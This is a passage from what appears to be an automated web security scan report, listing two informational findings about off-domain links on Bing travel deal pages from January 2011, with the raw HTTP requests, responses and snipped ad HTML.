                   <a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=travel+tips&d=4631074424554800&mkt=en-US&w=435c5f1a,279d08d0">Cached page</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://www.tsa.gov/travelers/airtravel/assistant/index.shtm">TSA: Travel Assistant</a>
...[SNIP]...
</cite> &middot;
                   <a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=travel+tips&d=4533862134120560&mkt=en-US&w=9d06dd8b,b3578fe6">Cached page</a>
...[SNIP]...
</script>

<script src="http://adsyndication.redacted/delivery/getads.js"
   type="text/javascript">

   
</script>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,70.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,72.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,74.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,76.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,78.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808483.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,80.1')">Help</a>
...[SNIP]...

22.396. http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel/deals/cheap-flights-to-the-caribbean.do

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /travel/deals/cheap-flights-to-the-caribbean.do?cid=msn_tab&form=trvcon HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 123869
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:08:46 GMT
Connection: close
Set-Cookie: lbc=913; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-orapn84mqiikyz4heutd5ddqlg8_VID-z6a6mpves4hea5yz7k95g3btp85uu_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:08:46 GMT; Path=/travel
Set-Cookie: JSESSIONID=72A006E79C9513DF29A0AC98BB71BFE1; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=E1B7A49D1F3C4255A02183C56A71F931; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:08:46 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cd90370b0399e4c5dac7624750cbd05f9; expires=Tue, 29-Jan-2013 17:08:46 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621028&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:08:46 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,245.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,247.1')">Hotmail</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'travelDeals_dealsPage','travelDeals1_dealsPage'); return false;" href="http&#58;&#47;&#47;632763.r.redacted&#47;&#63;ld&#61;4vJUn8Al9Itc06aDoVYhnUthVIruSr5Z7w7yuQSX76i2WUHGaNHSARPGFQJ0HNPptKjDUc36_TzoXvEX7QDhGprePSqYTAQGWtd1h7n-1AwPM7xOWHXGSTUNJ0Vvz9Fbb_tFRsThTKQ-kCCaD1W7Am0tpHSgjCNBkviiOSdLiknmCO2vjYoOczOA-yuJMtxa1FPMPOY2U36Qqrko6Z3mG46ErYTAmLaFANpUxEzZATV0g1VAlMvauC3ZieJtkREDMCl9pLrBAmY3M9IwgTR0l6WHo3BRpbBdvDBSUQioRjQEmHzsSZlWGTWxQ">Cruise Discounts--75&#37; Off</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'travelDeals_dealsPage','travelDeals2_dealsPage'); return false;" href="http&#58;&#47;&#47;0.r.redacted&#47;&#63;ld&#61;4vWi6BTOKZbCRlxwT2Ot6Lby_XI8sDu41bhR9URo4VAXKRYObI1_jriI7doOEaliHDqPm_OXYkGDJVC03Y97PttzbgVMbjTT6Smk9--AyEsAE7b7DVYWC4CooaAoVmZo-Pg2FJC9l3PV9ejmiIkrNUzsemHX_iPtHwcRHAHVLBg6Z2xRv9wmKLavz2I0XYrTkAI9xPvpx6e5fSqdZaV4k-Zkwog4FjZGl3gpbY0jQIP_Yy_jRqX4aGW5iqHpQK6gsmJoIb3zneDTiCwJiphJ7mXbBu6oLTFUT9V39vkHHfn8Zz8Vd2Mt2g57lYMDq9YCXhM_ERAWi2Wd4uWccUDh_V5jVUCUyUIZymYtJ2Byf_EQ1lm8gFECZjcz1hNYDwu-LIfdFRWpyr7iragIFIapxspVByHmX0CF2Oiw">Super Cheap Cruise Deals</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'travelDeals_dealsPage','travelDeals3_dealsPage'); return false;" href="http&#58;&#47;&#47;910157.r.redacted&#47;&#63;ld&#61;4vLfGGaKW_DlWVmv3D-FcpP6TAX_tmHolGxE9gTOYT1vBx7Q0P46plZ7uaXtE8zrB9Yj7TrN2s4GK_NRObruG8TdCGPud6ZTPVgnBhDsuWK9UwcdcDKV4UEYyAn53sPZd0FO0rDO5LLFRsLSkznRUWCcvT-Vj13uqt2SzCgOnL-J4j5J5pDJ1C9_rksea2L280aLTr8GIKuyYPyhfi-CWiq4zF7rtDyj9gExMEfOiuvaXq1OEd3Wfgpkt29GWLQhpRNVQJTH_dK-_xMGF-SSixVa5E7HgQJmNzPUUIFil788AEJzA7mmxceKOe--KhIHRf3g3v6jrbkreN">STA Travel&#174; Official Site</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights1_dealsPage'); return false;" href="http&#58;&#47;&#47;0.r.redacted&#47;&#63;ld&#61;4vNt5NDdlNanzzW7WC8GKopl4lZI71NLRlXpVqvv1ATrtwAZ3swsOGB-XarITmdmZki5e5V56Kwz3ys5sqMFEwwMb6xHuNhFcPMJss9Tfhd42QOc6oMMLl1U8O49aIjk_ONJQkrX7CQ_hTZNI7S6fI6l1e-FwRweG27esSK0JI00_21IDiFbp3UZIn4w1gcEy88L6z47CJ9exEuQR5KD6ddeT5xSB5oEPFyytDJcZ5PsPTJhYNHGyXuGvcft33sMrLgQ1tV_MvCnwc-jTzaNQ_0DaS8aDbY3D21iDPCRzy-q81VAlMFrPk7yB3jlnuVcO-B1dx9RAmY3M9tZCGffKvZDAjZj293fBK_f-EUefiuPpZ4k8ErPgJIzg">AA.com - Official Site</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights2_dealsPage'); return false;" href="http&#58;&#47;&#47;13391.r.redacted&#47;&#63;ld&#61;4vVnfnJsdNqRxk3oH9-DizYk06KaG4nxiFoHWIIOX6_fyeEmNQ1tIXS0M5OEdEN-f1WSUczyg9YXE0Mutnqrq7ow-hQb_i2KYIoklZq0U0xUokfAxx7gk5YACwC5_gAb1YizX4gT9PvM5GiiBIpndAXNwQ-JxIWycDKq_HJJqYTK9bMqO2OOJlO0M-7-BDa36eRiiUZ3cy7-AZOq4acUHengG5AD4NL8ncYfV49TLc6apuhJGPnHj81FqLeo1sz9aTo3bf6xjgXUGNXAL352-2S1rdnAD-4quFBdhBv7P2pxmx77d7E_KGh5rkHqufQmbeNVQJTCrQunbH_mWIYQFfawyzk6EQJmNzPdhYMyShf_FhFV7g0CYSJ249gN9b4cvcQddVF6-6ctTF">Cheap Flights at &#36;29&#42;</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights3_dealsPage'); return false;" href="http&#58;&#47;&#47;201283.r.redacted&#47;&#63;ld&#61;4v19JZ8GkMI1Qix8-c4GsEIfauKUf4YEW9Y1pmQ__sQghM5Ys7eEkSxcpGogPzw2G7A8EuunyPPGnAHD-0izTFAJwffS0SdT6mlLU34UeVIrUpUnHXSoYG5S_G30zFR9RSYVmvV_l_X05KvtHrGD7vI8NVvoUyvyXreMslK7t2Ijdt12AfetYtHxDO6HCswrdAipqZXmUr7AI_eUHSIn5CpGOA5dgZPSLhN7mXdys-tWDE-CU0ji139orlmBXAyS5A8qBLmuqHXwsQeHF_kQPVizVUCUxnvRyWaddd3tGcQVGWSRI0ECZjcz3WG9taSEeT9nHj64RTMfX47EGwPpp3lBhZ-AWxor6K-A">Cheap Flights - 60&#37; Off</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights4_dealsPage'); return false;" href="http&#58;&#47;&#47;0.r.redacted&#47;&#63;ld&#61;4vVgONHsRJ_6HlkaPUUiiGjrFrvmWzzRnxujclBJmZiF7CLsEiOVeEDr1MZdYnWHZwPNBH3EEasg2N7Be9B50LvYGI2Bi8KGmDdqQ1ctQK7vL0UJyx7xiSuWResWx57rMDrCGRaz9x3rbFA9QuQxsByCAhE3S8NDWwe1X5eRxH4Wv2qcA3mcYv4wfySlGwSV2zqnVgUPwIRteqEvLqHS2AzghTp6t82Enl-vuhlUONVz6tpjfl0dY1VaSrMqXhfYLJVbBlhIQo8RiCkbyOMSEduwHR1o7Pcs0m5wX7AJ27sBQ1VAlMT5iPX0bU9UY6vJZ_7XRVeBAmY3M9PdUPFIeVgiY-1lbEhuQYjRnKbGdvUrCT-JTrp3-DEZc">Southwest - Official Site</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights5_dealsPage'); return false;" href="http&#58;&#47;&#47;0.r.redacted&#47;&#63;ld&#61;4vayN6guVV7x_ikLZ7JrH9P00vHEcA9GdznqtuAyZrOvVlvWNIYbagJHCy7C3OeJm2a2LL80nFg1vnOB6kEGiGwWiUVHTJV5dSB2hnqvOwFhfvRmLPdMl2eryln6sETAJSry7_UWv5uyJdaMSnjciSHi_W1htmpy5u04FfD3k4hHokUxuN_ahWWx0mR7Q9zmPjT05QQ9-fH0RnySUcj4r2jN7gPwMai5sCIiapdit8oWDUlilbyc8axvdpFKsTmCGEhCyM8BDZzdiSAWj9durYktGNEc2nYRuIpnxMXnik7BXiaWRGMvNo4XrjN9Y3mtaAbgVNdWby2NZgpjwZpuWOBjVUCUz_2yQr9CbPnyOrP_ZeoslSECZjcz2TUKrAT3dARpECT5hp4ZNUPhwSGuFoN47kIpRFraAM1A">Cheap Flight Deals</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights6_dealsPage'); return false;" href="http&#58;&#47;&#47;154875.r.redacted&#47;&#63;ld&#61;4v8koBpq6C1f2J3rq1G2dZOd2Lgc15TXuaqDr6nyKZBTG-Yh-PHxh4Gf38qXijmExbLoWQmb3fDhreE68VWfBzqZXwn5OI0z1Wl46_XB_kXs7gmsaCFLAAWUgnZWDwWxpD8ns4EMR54McN_d-CqyXD9bJ86_pEabia5Wrod4m3G6pxYYKMLDtIuROc9OxvpqE12qqPBpvHNhywSIw3i0AISuDsHs5oF786KWnfKMA5pMFM2IJH_OahbUBlKO_lhGwJTI0nFHtecvR5UEtpt7dLp3NgMr0qQyVmHyijP43S1ow1VAlMOwfYosOnUPcT5ZwQhX6DnRAmY3M9eRNI4be9c-NugVS8VPsuTIUXov20OKBnxKw3NLcfOOs">Cheap Flights From &#36;39&#42;</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights7_dealsPage'); return false;" href="http&#58;&#47;&#47;0.r.redacted&#47;&#63;ld&#61;4vFjKmNS7IzlY7Jl8DVqgzUaP2wJMM0igm0G1jkWOzrihmOk8LWUtp6YAR9HJ1lsWHPOvu7-L7flReVj7xCFOC2qy52yADDBFmV3ITrCb7EkwHSpek7tkr6caOMq77MF4Q1CQU5P5v0h3hDAx4LQ83Wxg0h9YVWh6CNC9T--lF7Ny5omafLpeNKxF3x2A6wQatRmvnf3xzgQrTPXzsUyTXrsZXmOIs-2jEvmCMQ7mlf54cyGfgGQFRsNn9pB3YUS7LzOMoa1Wk7IR1oMQB1irJXi65Y2DqjwYGUAbY-An8XRQ21585b-uVKmEEwFN6GOrjLbmDY_X-r6hwx1ZXlMwtsTVUCUzzhz9jC6kxgeIexCTZZFplECZjcz2k2DPZm9wLWqSzLIaVXyt4NWv4Z_qjyEOl3BBEyilbww">cheap flights</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,258.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,260.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,262.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,264.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,266.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,268.1')">Help</a>
...[SNIP]...

22.397. http://www.bing.com/travel/deals/last-minute-flight-deals.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel/deals/last-minute-flight-deals.do

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /travel/deals/last-minute-flight-deals.do?cid=msn_tab&form=trvcon HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 116442
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:06 GMT
Connection: close
Set-Cookie: lbc=801; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-4098ubi97ki1nyz59phc2cqluqqg_VID-z1pliuomrgjd6fyz7bjb5gfae4faa_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:09:05 GMT; Path=/travel
Set-Cookie: JSESSIONID=A0C1F8D2DF78ABD0D0DCF0B91764466A; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=D3B0950C704649CF8B6003D0BA5B7255; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:05 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c4954f6be3aad4dd2922f5a6bae887e3e; expires=Tue, 29-Jan-2013 17:09:05 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:06 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,245.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,247.1')">Hotmail</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'travelDeals_dealsPage','travelDeals1_dealsPage'); return false;" href="http&#58;&#47;&#47;632763.r.redacted&#47;&#63;ld&#61;4vpe-UY3FEJrxDtIo_0OaDrv2daIyfuCaOKG9VbLgKsuEuGi_1v956phG0uOkWcTlusALoaAhRbExB3LEJ0WBaLdSyonr8_HysRvIsDH8Vl5-bnFYns8gvigTorVUxDPeiO0zxAfA_MHjN54ET5XZ1BX6GyCIQgDxpS1pTP6hJusF_6DRNnQ_NTjuSZb6XliY0G-mWVH7g1c8KLKJN43_bRkzM8Pyc5dTOW-PLMzxbgeg1VAlM0mKObL2lCFecVL2dQIZmIRAmY3M99CMLhulLD05vSJiq9f_G8Rvn1rdFVWNtOGNBQzASeMc">Cruise Discounts--75&#37; Off</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'travelDeals_dealsPage','travelDeals2_dealsPage'); return false;" href="http&#58;&#47;&#47;0.r.redacted&#47;&#63;ld&#61;4vRc2VCxiS2CsWFY5fYFnzfMR9bLqLsUQenYLb8gfCqPVuKuBGftKMHmeSIkHgtAGa0ucWzxZ12SQgxm-J07fiHvUvzDTR-2qIdbihDISPjj1AyOxzZTHqsl6ovPqvPHlLIi319EwbDgwrP5OfweJN5FY_TTzSlTuoD0NQG6Oea4b6CVKyqBb0BO_mgRn_uSK0p-GI4l1ITGHU6xhCoSC3X4tLY-GO3mrWIAZlyQyR7pT5cQcICwXoqLOyf_QqXyJLnHyWUV33L8N4g0Zh01ckkd5GIit5LbnqMA9pwwXVQ7jzSJJ1O_OZQr9FSuBvoNR1IMcrhdI8aBzEQHsDKmkM0zVUCUwq9PQZK4e7vdCDUR3BciWuECZjcz04TOPQYUlJ-AbOP8OXXtEE8vdVnhppS6oEKcUCFX1czA">Super Cheap Cruise Deals</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'travelDeals_dealsPage','travelDeals3_dealsPage'); return false;" href="http&#58;&#47;&#47;0.r.redacted&#47;&#63;ld&#61;4v2XsHUQ0-SrGsNki-pVTkRQQMiqz2vGe6LxZI3Nl_zZpRiP3FTq7ilAztSO8eCxnVj9xywUdAqe7y9lok0zj6F2jtkEHvrW9o_N-VNWTRD-BhsClsFMFicbjdyagj3UztI6hGbwTRRAPZkI7WV02eIArFgIairMlazdeoyYV5pskl9EzexDnWsM0f0Vvp2GjpRuhOFK8sA-KBlB-0vanvTNKicdDYpdoeyefdX15BMomhX4oX3-iBl2zFxcGcEYgccKoHgkdtFV7JkJiZHIRODkH5KAqBL73usSmGiSI21yq9cq663W9rrfC7wS6gBeLDEXmdSlnp1AZyNMYOnCVSdJ09AqnlYh9pDHRLK1lDmas1VAlMfkDTbyiKcU8o8uTIwtIstxAmY3M9Hhq3VZ7HtGSsWjK8JvGDry-xLKt8Z1N1JTObJTR8m8k">Expedia Vacation Savings</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights1_dealsPage'); return false;" href="http&#58;&#47;&#47;0.r.redacted&#47;&#63;ld&#61;4vMMRVNeXw7SzNIQp8I8MSZzP10ltrxPPv672eFH0FbUVD3zRxYKNSKgHwKMCseQx0nmdzJGvQuC5H3Wf9amPrmwBOl-LS7we315ckpqTT7IrTa45qxQHMpBYf8OoxsbmYQI6wu5Od2VYSrZ_T-oSSAxHkzzR7IWM8xaMOwhzkjSJs6C5HQOVvlNO1JWBc5rGgAZ5lmmYp4BdKLSoQgZcqOBCQo05NEXR4_MOT1kGNgqATHf7FL68zfrA00BrQXBLoS2MVAhC9BC9BgR-COp5kPMqAOZrJvOO4IVdXOYrLLwg1VAlMzjwSR91se16Ks2NjkmMP8xAmY3M9rxxc7L7WI708owxlIKnAAy0mOR8n2dVuT1ItnNTrBfw">AA.com - Official Site</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights2_dealsPage'); return false;" href="http&#58;&#47;&#47;13391.r.redacted&#47;&#63;ld&#61;4vFYm3A_Rct80ovuFF1tnJzzjiKB0UlFcDeK5TvLUgyM9CzQrln1sJXcrCYaLfi_9Tse0NYLb3LWN01gnUZEB0sRZzrDWi41IjkK8B1YI7sy9hQE3iNL1Mgzu3J2s2HKCh814SSmve_LNm55kC-qDG3ZZRCtCFgLlr_DxqDQ8t4Nof0TOXtQmArBi_3Is9TQNUWvAwcio1uxFtd8aDixtsBXgkEQHcWLYVV_uCv46gRFaZNsXechzHsS_9PKNEBJ2hTS3ql0m28tjpv49qFOli4Jhha-qF5l0T6vPNIpaQ5CQ1VAlMGwLueDt9-TDph2CamBDcXhAmY3M9DXnT31BJQ6zT5EzPzAetD_eK-NviJFltvAl4_LHDR4E">Cheap Flights at &#36;29&#42;</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights3_dealsPage'); return false;" href="http&#58;&#47;&#47;201283.r.redacted&#47;&#63;ld&#61;4vLDL1HgXAN-_5sL37i1jw9DecPkefItJyNWHiqfhn-UtOVpKtxfFnfjp76J9sYSnwuZ0BJWfeXtmGr0f5JIMiqjIczusHQ7dNyKxCJyTgJfIDmXWl_YoH0-UP6vl2ZtT3u6k7WW7JrIWGzp0vMCmytvp5jXIi2emgZ1TXPZtDTNf1oeqGLAr0EDX9RGXz9p4lWEPmA58wIWbJhdwl6yoRmCWSog3RkYTq-7lHVazPy_lPcKiN9p7wc3wwuamCycV_bbPqtGT8LBZK4Nbzx82paoy-Tynirika1GAsbjp8tbphS_VL7wmbmzgf0-oD_-ZTn6myTrOsxxV9BXjC4xpmIjVUCUxGnr3GFFYV8gu2oyWuS8XkECZjcz397Q22g3XS_WEYTo8b835R7Y2-E7pLj_rJ1qzlRA-UUg">Cheap Flights&#58; 60&#37; Off</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights4_dealsPage'); return false;" href="http&#58;&#47;&#47;0.r.redacted&#47;&#63;ld&#61;4vHzm6vAY1K1SQoya6w6E2tYNw_GMcUSGEFugSjFhGFQhAxFIB9uehaz98ZVnPM6_yKIaEyLcYMYQPxkwWDz_ypsqRI19jD_DOzH7IShmBiHgpHcDUi1kVJq9Hq4ihrzu7FMORNXWJO9Jim-2UWFmf4sb8LB6DMJtzRKWr5iPYZXk-u34DqdHYIiwqGn5Cv9Tjhzp2mEbil-qHbGCedSloUblbuKyalsUWww63FUr9XQ7IFnYQ65oo6bDVQdk-J2pG8VnxPoUVB8ELLLLoG9_ulP1kCOYoCxP8BT66U7fdqok1VAlMwzwW1vMXot0bh3TrkVgB2xAmY3M9ajl0ztxzKHDH_GjBX2fBENiWDPpwlSxwfjOIAxzdTI8">Southwest - Official Site</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights5_dealsPage'); return false;" href="http&#58;&#47;&#47;0.r.redacted&#47;&#63;ld&#61;4vWA67IO3b_WJhNoawHMtUCeAmpJmtue4lCWkYfGCFf9UuCKBPSOjfJVtJQ-jOj27raVqXnvrOx8xowBVZvicWt1S0BkgYalvv8miQ4Vu3BkGVokUjZPNdSXLySkP_FBTFo5A24sXPACr1MJ7QfM_q_LUc6YPfaRmSKrD0U4KY3HPxJ_X2WxRarNIalN8s7YfNsr3DQr6GCumoVq2-uKNg_uweJbT3liqUDAX72qo3TFaHn-SWL1Dq6cMtaycW-sZ3zCQswH22nG2myc6nzRz3rCq2qDVLv8N5KYs3RTpb1jE9iqwybPdZES11g2Fq7QEy3MVl2bA7ScjOW9DZNZNOOjVUCUz9_e9zpcm5iGunm1dpONUoECZjcz22LbTgLNXeJK0sy99ohQTMQLIqeNOkujBxJnNveYu6TQ">Super Cheap Flights</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights6_dealsPage'); return false;" href="http&#58;&#47;&#47;154875.r.redacted&#47;&#63;ld&#61;4v3hc0Ha9kx9ipjmAjQdmQnRbOXZ5YE6OdgfmbvSIIbQQ__SgeJMDExBMg3CYUK0PglxbfIeSkVOfG1UNVI6_0yFRFuEIiTtlJt0xFuDga0NbqJRhI3L-uo3mDIz-jInw7vdT9KSgDVHVNc6fNPS-BQwtkMR7R4koL3MiEtiKXa8HnwzUBgL4V9gg3Uj28QSCFXJhWMwf2lQpeEpaUbj6Chd8V7qUVftFS7esVT0VmFcnbjbbHS5ZV4YLinT4L4lUJtWIK9wLU_YGVqeXNjya-pjVUCUxWnFkSuSCARH7RwZ7nF47WECZjcz05zNM32RPsfFoqoo__fQCA7pNXm_ws2kEa5cempcG5ew">Cheap Flights - 65&#37; OFF</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights7_dealsPage'); return false;" href="http&#58;&#47;&#47;0.r.redacted&#47;&#63;ld&#61;4vUbS6RAnqnusOGkgnp1vo3Z8k4aM1TwgeeYcasb4a2eUb38nyJIyCVmqFMQaWXTvgYqUiBlYq6rP-OZI2phTtQV5UbHbCqRAytcK9aM2M4zDYlK3lsoHp8fQeplBL4a0Pf4bD4QmltFC2e59btsF7ITG6p5LzmvvImvW8vtP_5GyxKjtrLxLMXtIcjICwf1wDPuMwVv7IAQuZsBkz1PMLUFr7DTKX6jQcnJQ2gkIYQJE4NYDHg36x5hK3VSQzVYdctNKwpLk9fh9xeBA-jH0ToYKdAUOX1Fyzje7-ZR_FeuFPOZNdMr5H3d6XhGzEvQFps_FTCjaDiAuHnr2lHKQ7sDVUCUzF0X1i1NyAMPR80c77me7pECZjcz3ZCYmgcFoTdwNhUXKmLrCynNs_NPY3UCNijLhTdTgwWQ">cheap flights</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,258.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,260.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,262.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,264.1')">Advertise</a>
...[SNIP]...
